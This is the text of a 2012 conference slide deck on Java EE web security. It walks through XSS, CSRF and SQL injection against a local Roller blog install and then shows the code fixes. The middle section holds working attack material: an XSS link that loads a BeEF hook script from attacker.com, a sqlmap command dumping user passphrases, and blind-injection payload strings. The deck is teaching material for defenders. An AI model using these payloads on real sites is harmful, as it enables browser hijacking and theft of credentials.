Java EE Web Security By Example JAX 2012
May 06, 2015
Java EE Web Security By Example
JAX 2012
Java EE Web Security By Example 2
About
• Frank Kim – Consultant, ThinkSec – Author, SANS Secure Coding in Java/JEE – SANS Application Security Curriculum Lead
Java EE Web Security By Example 3
What You Should Know
• Hacking is not hard • Don’t trust any data
– Assume that your users are evil!
Java EE Web Security By Example 4
Outline
• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs
Java EE Web Security By Example 5
Cross-Site Scripting (XSS)
• Occurs when unvalidated data is displayed back to the browser
• Types of XSS – Stored – Reflected – Document Object Model (DOM) based
Java EE Web Security By Example 6
Cross-Site Request Forgery (CSRF)
Java EE Web Security By Example 7
SQL Injection (SQLi)
• Occurs when dynamic SQL queries are used – By injecting arbitrary SQL commands, attackers
can extend the meaning of the original query – Can potentially execute any SQL statement on
the database
• Very powerful – #1 on CWE/SANS Top 25 Most Dangerous
Software Errors – #1 on OWASP Top 10
Java EE Web Security By Example 8
Outline
• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs
Java EE Web Security By Example 9
What are We Testing?
• Installation of Roller 3.0 • Fake install of SANS AppSec Street Fighter Blog • Want to simulate the actions that a real attacker
might take – There are definitely other avenues of attack – We're walking through one attack scenario
Java EE Web Security By Example 10
Attack Scenario
1) XSS to control the victim's browser 2) Combine XSS and CSRF to conduct a
privilege escalation attack - Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
Java EE Web Security By Example 11
Spot the Vuln - XSS
Java EE Web Security By Example 12
XSS in head.jsp
Java EE Web Security By Example 13
Testing the "look" Param
• Admin pages include head.jsp • The param is persistent for the session
Java EE Web Security By Example 14
XSS Exploitation
• Introducing BeEF – Browser Exploitation Framework – http://www.bindshell.net/tools/beef
• Uses XSS to hook the victim's browser – Log user keystrokes, view browsing history,
execute JavaScript, etc – Advanced attacks - Metasploit integration,
browser exploits, etc
Java EE Web Security By Example 15
XSS Exploitation Overview
Attacker Victim
1) Sends link with evil BeEF script
http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
2) Victim clicks evil link
3) Victim's browser sends data to attacker
BeEF XSS Demo
Java EE Web Security By Example 17
Spot the Vuln - CSRF
Java EE Web Security By Example 18
CSRF in UserAdmin.jsp
Want to use CSRF to change
this field
CSRF Demo
Java EE Web Security By Example 20
Spot the Vuln – SQL Injection
Java EE Web Security By Example 21
SQL Injection in UserServlet
Java EE Web Security By Example 22
SQL Injection Testing
• UserServlet is vulnerable to SQLi http://localhost:8080/roller/roller-ui/authoring/user
No results
Java EE Web Security By Example 23
Exploiting SQL Injection
• Introducing sqlmap – http://sqlmap.sourceforge.net
• Tool that automates detection and exploitation of SQL Injection vulns – Supports MySQL, Oracle, PostgreSQL, MS SQL Server – Supports blind, inband, and batch queries – Fingerprint/enumeration - dump db schemas, tables/
column names, data, db users, etc – Takeover features - read/upload files, exec arbitrary
commands, exec Metasploit shellcode, etc
Java EE Web Security By Example 24
sqlmap Syntax
� Dump userids and passwords python sqlmap.py -u "http://localhost:8080/roller/roller-ui/
authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID==<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2
SQL Injection Demo
Java EE Web Security By Example 26
How it Works
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
Java EE Web Security By Example 27
Step By Step [0]
SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
returns ilovethetajmahal
Java EE Web Security By Example 28
Step By Step [1]
select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
returns i select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
returns l select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
returns o
Java EE Web Security By Example 29
Step By Step [2]
select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
returns 105 select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
returns 108 select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
returns 111
Java EE Web Security By Example 30
Attack Summary
1) XSS to control the victim's browser 2) Combine XSS and CSRF to conduct a
privilege escalation attack - Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly
Java EE Web Security By Example 31
Outline
• Web App Attack Refresher – XSS, CSRF, SQL Injection
• Testing – Hacking an open source app
• Secure Coding – Fixing security bugs
Java EE Web Security By Example 32
Application
Should I be consuming this?
Should I be emitting this?
Data Validation
Inbound Data
Outbound Data
Data Store
Validation
Encoding
Encoding
Validation
Outbound Data
Inbound Data
Validation
Java EE Web Security By Example 33
Output Encoding
• Encoding – Convert characters so they are treated as data
and not special characters
• Must escape differently depending where data is displayed on the page
• XSS Prevention Cheat Sheet http://www.owasp.org/index.php/
XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
Java EE Web Security By Example 34
Fix XSS in head.jsp
• Add URL encoding <link rel="stylesheet" type="text/css"
media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
Java EE Web Security By Example 35
Fix CSRF in Update User Functionality
• UserAdmin.jsp – Add anti-CSRF token
<input type="hidden" name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >
• UserAdminAction.java – Check anti-CSRF token
if (!CSRFTokenUtil.isValid(req.getSession(false), req)){
return mapping.findForward("error");
}
Java EE Web Security By Example 36
Fix SQL Injection in UserServlet.java
• Use parameterized queries correctly if (startsWith == null || startsWith.equals("")) {
query = "SELECT username, emailaddress FROM rolleruser";
stmt = con.prepareStatement(query); } else {
query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";
stmt = con.prepareStatement(query); stmt.setString(1, startsWith + "%"); stmt.setString(2, startsWith + "%"); }
rs = stmt.executeQuery();
Java EE Web Security By Example 37
Building Secure Software
Source: Microsoft SDL
Java EE Web Security By Example 38
Remember
• Hacking is not hard • Don’t trust any data
– Validate input – Encode output – Use CSRF tokens – Use parameterized queries